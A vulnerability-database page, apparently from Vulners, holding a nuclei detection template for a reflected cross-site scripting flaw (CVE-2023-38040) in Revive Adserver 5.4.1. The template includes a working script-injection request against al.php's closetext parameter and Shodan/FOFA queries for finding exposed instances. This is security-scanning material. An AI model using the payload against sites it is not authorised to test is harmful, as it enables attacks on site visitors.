Lucene search
K

Revive Adserver 5.4.1 - Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

Revive Adserver 5.4.1 - Reflected XSS vulnerability allows execution of malicious script

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-38040
17 Sep 202312:27
circl
CNNVD
Revive Adserver 跨站脚本漏洞
17 Sep 202300:00
cnnvd
CNVD
Revive Adserver Cross-Site Scripting Vulnerability (CNVD-2025-29407)
20 Sep 202300:00
cnvd
CVE
CVE-2023-38040
17 Sep 202304:41
cve
Cvelist
CVE-2023-38040
17 Sep 202304:41
cvelist
EUVD
EUVD-2023-41866
3 Oct 202520:07
euvd
Hacker One
Revive Adserver: Multiple cross-site scripting (XSS) vulnerabilities in Revive Adserver
7 Sep 202221:32
hackerone
NVD
CVE-2023-38040
17 Sep 202305:15
nvd
OSV
CVE-2023-38040
17 Sep 202304:41
osv
Prion
Cross site scripting
17 Sep 202305:15
prion
Rows per page
id: CVE-2023-38040

info:
  name: Revive Adserver 5.4.1 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    A reflected XSS vulnerability exists in Revive Adserver 5.4.1 and earlier versions.
  impact: |
    Allows attackers to execute malicious scripts in the context of a victim's browser
  remediation: |
    Upgrade Revive Adserver to version 5.4.2 or later to mitigate the vulnerability
  reference:
    - https://hackerone.com/reports/1694171
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38040
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-38040
    cwe-id: CWE-79
    epss-score: 0.01983
    epss-percentile: 0.78181
    cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    shodan-query: http.favicon.hash:106844876
    fofa-query: icon_hash="106844876"
    vendor: revive-adserver
    product: revive_adserver
  tags: cve,cve2023,revive-adserver,xss,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: word
        part: body
        words:
          - 'Revive Adserver'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/www/delivery/al.php?zoneid=1&layerstyle=geocities&closetext=%3Cscript%3Ealert(document.domain);%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain);</script>'

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a004730450220736ccadfea9bc48d0604abed6ff946dffb6c2c0ca920ff96676b0ff3df8b40de02210098971c39519eeb7306335eeaaa6dd9ca9c965106fa64ebb9f013d2b8a2d7db07:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.01983
SSVC
32